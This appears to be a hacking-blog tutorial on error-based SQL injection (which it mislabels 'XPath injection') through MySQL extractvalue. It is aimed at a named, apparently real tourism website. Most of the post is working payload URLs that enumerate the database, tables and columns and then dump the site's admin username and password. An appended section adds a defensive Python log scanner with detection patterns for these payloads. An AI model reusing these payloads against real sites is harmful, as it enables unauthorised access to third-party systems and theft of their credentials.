Welcome back to TechynHacky!!
I am Asman, and today I will show you how to dump all data in one shot with XPath injection.
So let's start :-)
Here is our test site!! :)
"http://www.latintourdimensions.com/overview/product_detail.php?id=352"
First, find the XPath vulnerability using:
+and+extractvalue()--
The website will respond with this!
[Incorrect parameter count in the call to native function 'extractvalue']
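The error comes from MySQL itself, so the text appended to the id parameter is being parsed as SQL. It means the website is vulnerable to XPATH extractvalue injection!!
Okay, now the next step :-)
Now let's find the database and the version of the database.
Here we will use this query!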
+Procedure Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -
Our website URL with the query will look like this!!
http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,0x426c61436b526f7365,0x3a,@@version,database())),1) -- -
The website will respond with something like this :-)
[XPATH syntax error: ''BlaCkRose:5.1.54-log:LTD']
With simple injection we can't extract the database, version, tables and columns in a single query.
Okay, so now we need the tables of the website.
So here is our next query!!
+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -
Using this query we can extract all the tables of the website from the database.
The website URL will look like this with the query!!
http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+substr(group_concat(table_name),10,50)+from+information_schema.tables+where+table_schema=database()))),1)-- -
Website response:
[XPATH syntax error: ''s,AdminLogin,Agencia,Agente,Bro']
Now we need the columns of the table AdminLogin,
so let's start!!!
Next query!!
+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=TABLE HEX))),1)-- -
AdminLogin is the table of interest in the database.
Okay, now convert AdminLogin into hex format using an online tool like:
hex.online-toolz.com/tools/text-hex-convertor.php
If you are using Hackbar, just click [Encoding > HEX Encoding > String To 00ff00ff],
type AdminLogin in the pop-up window and hit Enter!!
Then use the hex format in the query like this: [0xHEX FORMAT OF THE TABLE]
The website URL with the query will look like this!!
http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x41646d696e4c6f67696e))),1)-- -
The website responds with this!!
[XPATH syntax error: ''id,usuario,passw']
usuario and passw are the columns of interest in the table AdminLogin,
so our next query will be this!!
+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(column1,0x7e,column2)+from+TABLE_NAME))),1)-- -
Now replace:
TABLE_NAME = AdminLogin
COLUMN1 = usuario
COLUMN2 = passw
Now our website URL with the query will look like this!!
http://www.latintourdimensions.com/overview/product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,(select+group_concat(usuario,0x7e,passw)+from+AdminLogin))),1)-- -
The website responds with this!!
XPATH syntax error: ''admin~admin'
Here we got our things!! :-D
And we are done.. :-P
Thanks for reading and Visiting :-P
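
A defender's view of the requests above, as an added example that is not part of the original post: a Python scanner that URL-decodes each query parameter in a web access log and flags the request shapes used in this walkthrough. The log lines, the path and the assumption that id is an integer-only parameter are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators taken from the request shapes shown in the post.
INDICATORS = {
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "procedure_analyse": re.compile(r"\bprocedure\s+analyse\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.", re.I),
    "server_variable": re.compile(r"@@\w+"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "sql_comment": re.compile(r"--(\s|$)|/\*"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application treats as integers

def inspect_url(url):
    """Return {param: [finding, ...]} for every suspicious query parameter."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # parse_qsl has already decoded %xx and '+'; collapse whitespace runs.
        text = re.sub(r"\s+", " ", value).strip()
        hits = [label for label, rx in INDICATORS.items() if rx.search(text)]
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,10}", text):
            hits.insert(0, "non_numeric_id")
        if hits:
            findings[name] = hits
    return findings

def scan_log(lines):
    """Return [(line_number, findings)] for access-log lines that look injected."""
    results = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and (found := inspect_url(match.group(1))):
            results.append((number, found))
    return results

# Constructed sample log (documentation IP range, hypothetical path).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /product_detail.php?id=352 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /product_detail.php?id=352+and+extractvalue()-- HTTP/1.1" 200 311',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /product_detail.php?id=352+Procedure+Analyse+(extractvalue(0,concat(0x27,@@version)),1)--+- HTTP/1.1" 200 340',
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(number, found)
```

The non_numeric_id finding points at the root fix: validate id as an integer and bind it as a parameter in a prepared statement, so that none of the requests above reach the SQL parser.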